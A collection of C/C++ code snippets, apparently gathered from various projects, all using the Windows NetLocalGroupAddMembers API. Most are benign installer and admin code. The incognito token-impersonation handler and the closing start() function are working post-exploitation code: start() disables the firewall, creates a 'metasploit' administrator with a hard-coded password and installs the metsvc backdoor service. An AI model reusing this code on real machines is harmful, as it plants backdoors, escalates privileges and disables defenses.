UINT initializeAfsAdminGroup(void) { PSID psidAdmin = NULL; SID_IDENTIFIER_AUTHORITY auth = SECURITY_NT_AUTHORITY; NET_API_STATUS status; LOCALGROUP_MEMBERS_INFO_0 *gmAdmins = NULL; DWORD dwNEntries, dwTEntries; WCHAR AdminGroupName[UNLEN+1]; DWORD cchName = UNLEN; if (!LookupAliasFromRid( NULL, DOMAIN_ALIAS_RID_ADMINS, AdminGroupName, &cchName )) { /* if we fail, we will try the English string "Administrators" */ wcsncpy(AdminGroupName, L"Administrators", UNLEN+1); AdminGroupName[UNLEN] = 0; } status = NetLocalGroupGetMembers(NULL, AdminGroupName, 0, (LPBYTE *) &gmAdmins, MAX_PREFERRED_LENGTH, &dwNEntries, &dwTEntries, NULL); if(status) return status; status = NetLocalGroupAddMembers(NULL, AFSCLIENT_ADMIN_GROUPNAMEW, 0, (LPBYTE) gmAdmins, dwNEntries); NetApiBufferFree( gmAdmins ); return status; }
static BOOL AddSelectedGroupsToUser(HWND hwndDlg, PMEMBERSHIP_USER_DATA pUserData) { HWND hwndLV; INT nItem; TCHAR szGroupName[UNLEN]; BOOL bResult = FALSE; BOOL bFound; DWORD i; LOCALGROUP_MEMBERS_INFO_3 memberInfo; NET_API_STATUS status; hwndLV = GetDlgItem(hwndDlg, IDC_USER_ADD_MEMBERSHIP_LIST); if (ListView_GetSelectedCount(hwndLV) > 0) { nItem = ListView_GetNextItem(hwndLV, -1, LVNI_SELECTED); while (nItem != -1) { /* Get the new user name */ ListView_GetItemText(hwndLV, nItem, 0, szGroupName, UNLEN); bFound = FALSE; for (i = 0; i < pUserData->dwGroupCount; i++) { if (_tcscmp(pUserData->pGroupData[i].lgrui0_name, szGroupName) == 0) bFound = TRUE; } if (!bFound) { memberInfo.lgrmi3_domainandname = pUserData->szUserName; status = NetLocalGroupAddMembers(NULL, szGroupName, 3, (LPBYTE)&memberInfo, 1); if (status == NERR_Success) { DebugPrintf(_TEXT("Selected group: %s"), szGroupName); bResult = TRUE; } else { TCHAR szText[256]; wsprintf(szText, TEXT("Error: %u"), status); MessageBox(NULL, szText, TEXT("NetLocalGroupAddMembers"), MB_ICONERROR | MB_OK); } } nItem = ListView_GetNextItem(hwndLV, nItem, LVNI_SELECTED); } } return bResult; }
/** * Add a member to a local domain group. * * @param appContext Application context reference. * @param aliasNameC Group name. * @param memberNameC Memeber name. * @return 0 on success; error code on failure. */ DWORD AdtNetLocalGroupAddMember( IN AppContextTP appContext, IN PSTR aliasNameC, IN PSTR memberNameC ) { DWORD dwError = ERROR_SUCCESS; LOCALGROUP_MEMBERS_INFO_3 memberinfo = {0}; PWSTR hostName = NULL; PWSTR aliasName = NULL; PWSTR memberName = NULL; PSTR memberNameN = NULL; dwError = NormalizeUserName(memberNameC, appContext->workConn->domainName, &memberNameN); ADT_BAIL_ON_ERROR_NP(dwError); dwError = LwMbsToWc16s((PCSTR) (appContext->workConn->serverName), &hostName); ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError); dwError = LwMbsToWc16s((PCSTR) aliasNameC, &aliasName); ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError); dwError = LwMbsToWc16s((PCSTR) memberNameN, &memberName); ADT_BAIL_ON_ALLOC_FAILURE_NP(!dwError); memberinfo.lgrmi3_domainandname = memberName; PrintStderr(appContext, LogLevelTrace, "%s: Adding member %s to group %s ...\n", appContext->actionName, memberNameN, aliasNameC); /* Perform the delete operation. */ if(!appContext->gopts.isReadOnly) { dwError = NetLocalGroupAddMembers(hostName, aliasName, 3, &memberinfo, 1); } if (dwError) { dwError += ADT_WIN_ERR_BASE; ADT_BAIL_ON_ERROR_NP(dwError); } PrintStderr(appContext, LogLevelTrace, "%s: Done adding member %s to group %s ...\n", appContext->actionName, memberNameN, aliasNameC); cleanup: LW_SAFE_FREE_MEMORY(hostName); LW_SAFE_FREE_MEMORY(aliasName); LW_SAFE_FREE_MEMORY(memberName); LW_SAFE_FREE_MEMORY(memberNameN); return dwError; error: goto cleanup; }
bool UserUtilities::AddUserToGroup(CString strUserName, CString strGroupName) { LOCALGROUP_MEMBERS_INFO_3 *group = new LOCALGROUP_MEMBERS_INFO_3(); group->lgrmi3_domainandname = strUserName.GetBuffer(); int res = NetLocalGroupAddMembers(NULL, strGroupName, 3, (LPBYTE)group, 1); if(res == 0) { return true; } return false; }
DWORD request_incognito_add_localgroup_user(Remote *remote, Packet *packet) { DWORD dwLevel = 1, dwError = 0, num_tokens = 0, i; NET_API_STATUS nStatus; LOCALGROUP_MEMBERS_INFO_3 localgroup_member; SavedToken *token_list = NULL; HANDLE saved_token; wchar_t dc_netbios_name_u[BUF_SIZE], username_u[BUF_SIZE], groupname_u[BUF_SIZE]; char *dc_netbios_name, *groupname, *username, return_value[BUF_SIZE] = "", temp[BUF_SIZE] = ""; // Read arguments Packet *response = packet_create_response(packet); dc_netbios_name = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME); groupname = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_GROUPNAME); username = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_USERNAME); mbstowcs(dc_netbios_name_u, dc_netbios_name, strlen(dc_netbios_name)+1); mbstowcs(username_u, username, strlen(username)+1); mbstowcs(groupname_u, groupname, strlen(groupname)+1); localgroup_member.lgrmi3_domainandname = username_u; // Save current thread token if one is currently being impersonated if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token)) saved_token = INVALID_HANDLE_VALUE; token_list = get_token_list(&num_tokens); if (!token_list) { sprintf(return_value, "[-] Failed to enumerate tokens with error code: %d\n", GetLastError()); goto cleanup; } sprintf(return_value, "[*] Attempting to add user %s to localgroup %s on host %s\n", username, groupname, dc_netbios_name); // Attempt to add user to localgroup with every token for (i=0;i<num_tokens;i++) if (token_list[i].token) { // causes major problems (always error 127) once you have impersonated this token once. No idea why!!! if (!_stricmp("NT AUTHORITY\\ANONYMOUS LOGON", token_list[i].username)) continue; ImpersonateLoggedOnUser(token_list[i].token); nStatus = NetLocalGroupAddMembers(dc_netbios_name_u, groupname_u, 3, (LPBYTE)&localgroup_member, 1); RevertToSelf(); switch (nStatus) { case ERROR_ACCESS_DENIED: case ERROR_LOGON_FAILURE: // unknown username or bad password case ERROR_INVALID_PASSWORD: break; case NERR_Success: strncat(return_value, "[+] Successfully added user to local group\n", sizeof(return_value)-strlen(return_value)-1); goto cleanup; case NERR_InvalidComputer: strncat(return_value, "[-] Computer name invalid\n", sizeof(return_value)-strlen(return_value)-1); goto cleanup; case ERROR_NO_SUCH_MEMBER: strncat(return_value, "[-] User not found\n", sizeof(return_value)-strlen(return_value)-1); goto cleanup; case NERR_GroupNotFound: case 1376: // found by testing (also group not found) strncat(return_value, "[-] Local group not found\n", sizeof(return_value)-strlen(return_value)-1); goto cleanup; case ERROR_MEMBER_IN_ALIAS: strncat(return_value, "[-] User already in group\n", sizeof(return_value)-strlen(return_value)-1); goto cleanup; default: sprintf(temp, "Unknown error: %d \n", nStatus); strncat(return_value, temp, sizeof(return_value)-strlen(return_value)-1); goto cleanup; } } strncat(return_value, "[-] Access denied with all tokens\n", sizeof(return_value)-strlen(return_value)-1); cleanup: for (i=0;i<num_tokens;i++) CloseHandle(token_list[i].token); free(token_list); packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value); packet_transmit_response(ERROR_SUCCESS, remote, response); // Restore token impersonation if (saved_token != INVALID_HANDLE_VALUE) ImpersonateLoggedOnUser(saved_token); return ERROR_SUCCESS; }
/** * @brief * add_to_administrators_group: returns 0 if 'dnamew\unamew' has been added * to local "Administrators" group; 1 otherwise. * * @param[in] dnamew - account name * @param[in] unamew - A pointer to a constant string that specifies * the name of the user account for which to set * information. * * @return int * @retval 0 : 'dnamew\unamew' has been added to local "Administrators" group. * @retval 1 : 'dnamew\unamew' could not add to local "Administrators" group. */ int add_to_administrators_group(wchar_t *dnamew, wchar_t *unamew) { SID *gsid = NULL; char *gname = NULL; /* special group to add service account to */ wchar_t full_unamew[PBS_MAXHOSTNAME+UNLEN+2]; /* domain\user\0 */ int ret_val = 1; gsid = create_administrators_sid(); if (gsid && (gname=getgrpname(gsid))) { LOCALGROUP_MEMBERS_INFO_3 member; NET_API_STATUS nstatus; wchar_t gnamew[GNLEN+1]; mbstowcs(gnamew, gname, GNLEN+1); #if _MSC_VER >= 1400 swprintf(full_unamew, PBS_MAXHOSTNAME+UNLEN+2, L"%s\\%s", dnamew, unamew); #else swprintf(full_unamew, L"%s\\%s", dnamew, unamew); #endif member.lgrmi3_domainandname = (wchar_t *)full_unamew; if (for_info_only) nstatus = NERR_Success; else nstatus=NetLocalGroupAddMembers(NULL, gnamew, 3, (LPBYTE)&member, 1); if( (nstatus == NERR_Success) || \ (nstatus == ERROR_MEMBER_IN_ALIAS) ) { printf("%s %S to group \"%S\"\n", (for_info_only?"Adding":"Added"), full_unamew, gnamew); ret_val = 0; } else { fprintf(stderr, "Failed to add %S to group \"%S\": error status =%d\n", full_unamew, gnamew, nstatus); } } if (strlen(winlog_buffer) > 0) { /* any error in getdefgrpname() */ fprintf(stderr, "%s\n", winlog_buffer); } if (gsid) FreeSid(gsid); else fprintf(stderr, "Failed to add %S\\%S to Administrators group: bad SID\n", dnamew, unamew); if (gname) (void)free(gname); else fprintf(stderr, "Failed to get Administrators's actual group name\n"); return (ret_val); }
int main(int argc, const char **argv) { NET_API_STATUS status; struct libnetapi_ctx *ctx = NULL; const char *hostname = NULL; const char *groupname = NULL; struct LOCALGROUP_MEMBERS_INFO_0 *g0; struct LOCALGROUP_MEMBERS_INFO_3 *g3; uint32_t total_entries = 0; uint8_t *buffer = NULL; uint32_t level = 3; const char **names = NULL; int i = 0; poptContext pc; int opt; struct poptOption long_options[] = { POPT_AUTOHELP POPT_COMMON_LIBNETAPI_EXAMPLES POPT_TABLEEND }; status = libnetapi_init(&ctx); if (status != 0) { return status; } pc = poptGetContext("localgroup_addmembers", argc, argv, long_options, 0); poptSetOtherOptionHelp(pc, "hostname groupname member1 member2 ..."); while((opt = poptGetNextOpt(pc)) != -1) { } if (!poptPeekArg(pc)) { poptPrintHelp(pc, stderr, 0); goto out; } hostname = poptGetArg(pc); if (!poptPeekArg(pc)) { poptPrintHelp(pc, stderr, 0); goto out; } groupname = poptGetArg(pc); if (!poptPeekArg(pc)) { poptPrintHelp(pc, stderr, 0); goto out; } names = poptGetArgs(pc); for (i=0; names[i] != NULL; i++) { total_entries++; } switch (level) { case 0: status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_0) * total_entries, (void **)&g0); if (status) { printf("NetApiBufferAllocate failed with: %s\n", libnetapi_get_error_string(ctx, status)); goto out; } for (i=0; i<total_entries; i++) { if (!ConvertStringSidToSid(names[i], &g0[i].lgrmi0_sid)) { printf("could not convert sid\n"); goto out; } } buffer = (uint8_t *)g0; break; case 3: status = NetApiBufferAllocate(sizeof(struct LOCALGROUP_MEMBERS_INFO_3) * total_entries, (void **)&g3); if (status) { printf("NetApiBufferAllocate failed with: %s\n", libnetapi_get_error_string(ctx, status)); goto out; } for (i=0; i<total_entries; i++) { g3[i].lgrmi3_domainandname = names[i]; } buffer = (uint8_t *)g3; break; default: break; } /* NetLocalGroupAddMembers */ status = NetLocalGroupAddMembers(hostname, groupname, level, buffer, total_entries); if (status != 0) { printf("NetLocalGroupAddMembers failed with: %s\n", libnetapi_get_error_string(ctx, status)); } out: libnetapi_free(ctx); poptFreeContext(pc); return status; }
DWORD create_admin_user(void) { NET_API_STATUS rc; BOOL b; DWORD dw; USER_INFO_1 ud; LOCALGROUP_MEMBERS_INFO_0 gd; SID_NAME_USE snu; DWORD cbSid = 256; // 256 bytes should be enough for everybody :) BYTE Sid[256]; DWORD cbDomain = 256 / sizeof(TCHAR); TCHAR Domain[256]; OutputDebugString( _T("ADDUSER: in create_admin_user") ); // // Create user // http://msdn.microsoft.com/en-us/library/aa370649%28v=VS.85%29.aspx // memset(&ud, 0, sizeof(ud)); ud.usri1_name = _T("audit"); // username ud.usri1_password = _T("Test123456789!"); // password ud.usri1_priv = USER_PRIV_USER; // cannot set USER_PRIV_ADMIN on creation ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT; // must be set ud.usri1_script_path = NULL; rc = NetUserAdd( NULL, // local server 1, // information level (LPBYTE)&ud, NULL // error value ); if (rc != NERR_Success) { _tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc); return rc; } // // Get user SID // http://msdn.microsoft.com/en-us/library/aa379159(v=vs.85).aspx // b = LookupAccountName( NULL, // local server _T("audit"), // account name Sid, // SID &cbSid, // SID size Domain, // Domain &cbDomain, // Domain size &snu // SID_NAME_USE (enum) ); if (!b) { dw = GetLastError(); _tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw); return dw; } // // Add user to "Administrators" local group // http://msdn.microsoft.com/en-us/library/aa370436%28v=VS.85%29.aspx // memset(&gd, 0, sizeof(gd)); gd.lgrmi0_sid = (PSID)Sid; rc = NetLocalGroupAddMembers( NULL, // local server _T("Administrators"), 0, // information level (LPBYTE)&gd, 1 // only one entry ); if (rc != NERR_Success) { _tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc); return rc; } OutputDebugString( _T("ADDUSER: admin user created successfully!") ); return 0; }
///////////////////////////////////////////////////////////////////// // // Function: // // Description: // ///////////////////////////////////////////////////////////////////// UINT CACreateBOINCGroups::OnExecution() { NET_API_STATUS nasReturnValue; DWORD dwParameterError; UINT uiReturnValue = -1; BOOL bBOINCAdminsCreated = FALSE; BOOL bBOINCUsersCreated = FALSE; BOOL bBOINCProjectsCreated = FALSE; tstring strUserSID; tstring strUsersGroupName; tstring strBOINCMasterAccountUsername; tstring strBOINCProjectAccountUsername; tstring strEnableProtectedApplicationExecution; PSID pAdminSID = NULL; PSID pInstallingUserSID = NULL; PSID pBOINCMasterSID = NULL; PSID pBOINCProjectSID = NULL; SID_IDENTIFIER_AUTHORITY SIDAuthNT = SECURITY_NT_AUTHORITY; uiReturnValue = GetProperty( _T("UserSID"), strUserSID ); if ( uiReturnValue ) return uiReturnValue; uiReturnValue = GetProperty( _T("GROUPALIAS_USERS"), strUsersGroupName ); if ( uiReturnValue ) return uiReturnValue; uiReturnValue = GetProperty( _T("BOINC_MASTER_USERNAME"), strBOINCMasterAccountUsername ); if ( uiReturnValue ) return uiReturnValue; uiReturnValue = GetProperty( _T("BOINC_PROJECT_USERNAME"), strBOINCProjectAccountUsername ); if ( uiReturnValue ) return uiReturnValue; uiReturnValue = GetProperty( _T("ENABLEPROTECTEDAPPLICATIONEXECUTION2"), strEnableProtectedApplicationExecution ); if ( uiReturnValue ) return uiReturnValue; // Create a SID for the BUILTIN\Administrators group. if(!AllocateAndInitializeSid( &SIDAuthNT, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdminSID)) { LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, GetLastError(), _T("AllocateAndInitializeSid Error for BUILTIN\\Administrators") ); return ERROR_INSTALL_FAILURE; } // Create a SID for the current logged in user. if(!ConvertStringSidToSid(strUserSID.c_str(), &pInstallingUserSID)) { LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, GetLastError(), _T("ConvertStringSidToSid Error for installing user") ); return ERROR_INSTALL_FAILURE; } // Create a SID for the 'boinc_master' user account. if (_T("1") == strEnableProtectedApplicationExecution) { if(!GetAccountSid(NULL, strBOINCMasterAccountUsername.c_str(), &pBOINCMasterSID)) { LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, GetLastError(), _T("GetAccountSid Error for 'boinc_master' user account") ); return ERROR_INSTALL_FAILURE; } } // Create a SID for the 'boinc_project' user account. if (_T("1") == strEnableProtectedApplicationExecution) { if(!GetAccountSid(NULL, strBOINCProjectAccountUsername.c_str(), &pBOINCProjectSID)) { LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, GetLastError(), _T("GetAccountSid Error for 'boinc_master' user account") ); return ERROR_INSTALL_FAILURE; } } // Create the 'boinc_admins' group if needed // LOCALGROUP_INFO_1 lgrpiAdmins; lgrpiAdmins.lgrpi1_name = _T("boinc_admins"); lgrpiAdmins.lgrpi1_comment = _T("Accounts in this group can control the BOINC client."); nasReturnValue = NetLocalGroupAdd( NULL, 1, (LPBYTE)&lgrpiAdmins, &dwParameterError ); if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAdd retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to create the 'boinc_admins' group.") ); return ERROR_INSTALL_FAILURE; } if (NERR_Success == nasReturnValue) { bBOINCAdminsCreated = TRUE; } // If we just created the 'boinc_admins' local group then we need to populate // it with the default accounts. LOCALGROUP_MEMBERS_INFO_0 lgrmiAdmins; lgrmiAdmins.lgrmi0_sid = pAdminSID; nasReturnValue = NetLocalGroupAddMembers( NULL, _T("boinc_admins"), 0, (LPBYTE)&lgrmiAdmins, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'boinc_admins' group (Administrator).") ); return ERROR_INSTALL_FAILURE; } lgrmiAdmins.lgrmi0_sid = pInstallingUserSID; nasReturnValue = NetLocalGroupAddMembers( NULL, _T("boinc_admins"), 0, (LPBYTE)&lgrmiAdmins, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'boinc_admins' group (Installing User).") ); return ERROR_INSTALL_FAILURE; } if (_T("1") == strEnableProtectedApplicationExecution) { lgrmiAdmins.lgrmi0_sid = pBOINCMasterSID; nasReturnValue = NetLocalGroupAddMembers( NULL, _T("boinc_admins"), 0, (LPBYTE)&lgrmiAdmins, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'boinc_admins' group (BOINC Master).") ); return ERROR_INSTALL_FAILURE; } } // Create the 'boinc_users' group if needed // LOCALGROUP_INFO_1 lgrpiUsers; lgrpiUsers.lgrpi1_name = _T("boinc_users"); lgrpiUsers.lgrpi1_comment = _T("Accounts in this group can monitor the BOINC client."); nasReturnValue = NetLocalGroupAdd( NULL, 1, (LPBYTE)&lgrpiUsers, &dwParameterError ); if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAdd retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to create the 'boinc_users' group.") ); return ERROR_INSTALL_FAILURE; } if (NERR_Success == nasReturnValue) { bBOINCUsersCreated = TRUE; } // Create the 'boinc_project' group if needed // LOCALGROUP_INFO_1 lgrpiProjects; lgrpiProjects.lgrpi1_name = _T("boinc_projects"); lgrpiProjects.lgrpi1_comment = _T("Accounts in this group are used to execute boinc applications."); nasReturnValue = NetLocalGroupAdd( NULL, 1, (LPBYTE)&lgrpiProjects, &dwParameterError ); if ((NERR_Success != nasReturnValue) && (ERROR_ALIAS_EXISTS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAdd retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to create the 'boinc_projects' group.") ); return ERROR_INSTALL_FAILURE; } if (NERR_Success == nasReturnValue) { bBOINCProjectsCreated = TRUE; } // If the user has enabled protected application execution then we need to add the 'boinc_project' // account to the local group and the 'Users' local group. As an aside 'boinc_master' is also added // to the 'Users' group. if (_T("1") == strEnableProtectedApplicationExecution) { LOCALGROUP_MEMBERS_INFO_0 lgrmiMembers; lgrmiMembers.lgrmi0_sid = pBOINCProjectSID; nasReturnValue = NetLocalGroupAddMembers( NULL, _T("boinc_projects"), 0, (LPBYTE)&lgrmiMembers, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'boinc_projects' group (boinc_project).") ); return ERROR_INSTALL_FAILURE; } nasReturnValue = NetLocalGroupAddMembers( NULL, strUsersGroupName.c_str(), 0, (LPBYTE)&lgrmiMembers, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'Users' group (boinc_project).") ); return ERROR_INSTALL_FAILURE; } lgrmiMembers.lgrmi0_sid = pBOINCMasterSID; nasReturnValue = NetLocalGroupAddMembers( NULL, strUsersGroupName.c_str(), 0, (LPBYTE)&lgrmiMembers, 1 ); if ((NERR_Success != nasReturnValue) && (ERROR_MEMBER_IN_ALIAS != nasReturnValue)) { LogMessage( INSTALLMESSAGE_INFO, NULL, NULL, NULL, nasReturnValue, _T("NetLocalGroupAddMembers retval") ); LogMessage( INSTALLMESSAGE_ERROR, NULL, NULL, NULL, nasReturnValue, _T("Failed to add user to the 'Users' group (boinc_master).") ); return ERROR_INSTALL_FAILURE; } } SetProperty( _T("BOINC_ADMINS_GROUPNAME"), _T("boinc_admins") ); SetProperty( _T("BOINC_USERS_GROUPNAME"), _T("boinc_users") ); SetProperty( _T("BOINC_PROJECTS_GROUPNAME"), _T("boinc_projects") ); if (bBOINCAdminsCreated || bBOINCUsersCreated || bBOINCProjectsCreated) { RebootWhenFinished(); } if(pAdminSID != NULL) FreeSid(pAdminSID); if(pInstallingUserSID != NULL) FreeSid(pInstallingUserSID); if(pBOINCMasterSID != NULL) FreeSid(pBOINCMasterSID); if(pBOINCProjectSID != NULL) FreeSid(pBOINCProjectSID); return ERROR_SUCCESS; }
JSBool netlocalgroupaddmembers(JSContext * cx, JSObject * obj, uintN argc, jsval * argv, jsval * rval) { JS_BeginRequest(cx); if(argc < 2) { JS_ReportError(cx, "Must pass members to be added."); JS_EndRequest(cx); return JS_FALSE; } LOCALGROUP_MEMBERS_INFO_0 * members; DWORD * lookupResult; DWORD memberCount = 0; JSString * groupName = JS_ValueToString(cx, argv[0]); argv[0] = STRING_TO_JSVAL(groupName); if(JSVAL_IS_OBJECT(argv[1]) && JS_IsArrayObject(cx, JSVAL_TO_OBJECT(argv[1]))) { JSObject * memberArray; JS_ValueToObject(cx, argv[1], &memberArray); argv[1] = OBJECT_TO_JSVAL(memberArray); JS_GetArrayLength(cx, memberArray, (jsuint*)&memberCount); members = (LOCALGROUP_MEMBERS_INFO_0*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LOCALGROUP_MEMBERS_INFO_0) * memberCount); lookupResult = (DWORD*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DWORD) * memberCount); JS_EnterLocalRootScope(cx); for(DWORD i = 0; i < memberCount; i++) { jsval curMemberVal; JSString * curMemberString; JS_GetElement(cx, memberArray, (jsint)i, &curMemberVal); curMemberString = JS_ValueToString(cx, curMemberVal); members[i].lgrmi0_sid = convert_jsstring_to_sid(cx, curMemberString, &lookupResult[i]); } JS_LeaveLocalRootScope(cx); } else { JSString * memberString = JS_ValueToString(cx, argv[1]); argv[1] = STRING_TO_JSVAL(memberString); members = (LOCALGROUP_MEMBERS_INFO_0*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(LOCALGROUP_MEMBERS_INFO_0)); lookupResult = (DWORD*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DWORD)); members->lgrmi0_sid = convert_jsstring_to_sid(cx, memberString, lookupResult); memberCount = 1; } for(DWORD i = 0; i < memberCount; i++) { if(lookupResult[i] == 0) { JS_YieldRequest(cx); lookupResult[i] = NetLocalGroupAddMembers(NULL, (LPWSTR)JS_GetStringChars(groupName), 0, (LPBYTE)&members[i], 1); } } JSObject * retArray = JS_NewArrayObject(cx, 0, NULL); *rval = OBJECT_TO_JSVAL(retArray); for(DWORD i = 0; i < memberCount; i++) { jsval curResultVal; JS_NewNumberValue(cx, lookupResult[i], &curResultVal); JS_DefineElement(cx, retArray, i, curResultVal, NULL, NULL, 0); HeapFree(GetProcessHeap(), 0, members[i].lgrmi0_sid); } HeapFree(GetProcessHeap(), 0, members); HeapFree(GetProcessHeap(), 0, lookupResult); JS_EndRequest(cx); return JS_TRUE; }
void start(){ //fix wow32-64 fsredir PVOID OldValue; Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress( GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection"); if( disableWow ) disableWow(&OldValue); char windowsPath[MAX_PATH]; GetWindowsDirectoryA(windowsPath,MAX_PATH); SetCurrentDirectoryA(windowsPath); //turn off fw HKEY mkey; DWORD four = 4; RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc", 0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey); RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD)); RegCloseKey(mkey); //add user USER_INFO_1 userinfo; userinfo.usri1_name = L"metasploit"; userinfo.usri1_password = L"p@SSw0rd!123456"; userinfo.usri1_priv = USER_PRIV_USER; userinfo.usri1_home_dir = NULL; userinfo.usri1_comment = L""; userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD; userinfo.usri1_script_path = NULL; DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL); if(res == NERR_Success){ LOCALGROUP_MEMBERS_INFO_3 lgmi3; lgmi3.lgrmi3_domainandname = userinfo.usri1_name; NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1); } //start metsvc STARTUPINFOA strt; PROCESS_INFORMATION proci; for(int i = 0; i < sizeof(strt); i++) ((char*)&strt)[i]=0; for(int i = 0; i < sizeof(proci); i++) ((char*)&proci)[i]=0; if( disableWow )//if 64 bit CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci); else CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci); //permissions, owner? DWORD sidSize = SECURITY_MAX_SID_SIZE; PSID ownersid = LocalAlloc(LMEM_FIXED,sidSize); CreateWellKnownSid(WinLocalSystemSid, NULL, ownersid, &sidSize); SetNamedSecurityInfoA("System32\\spoolsv.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL); SetNamedSecurityInfoA("System32\\spoolsv.bak.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL); //copy file back while(MoveFileA("System32\\spoolsv.bak.exe","System32\\spoolsv.exe") == 0){ DeleteFileA("System32\\spoolsv.exe"); Sleep(100); } //This can be added so fw disable takes effect immediately and this process exits /*/reboot HANDLE tokenh; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh); TOKEN_PRIVILEGES tkp, otkp; DWORD oldsize; tkp.PrivilegeCount = 1; LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid)); tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize); ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);//*/ }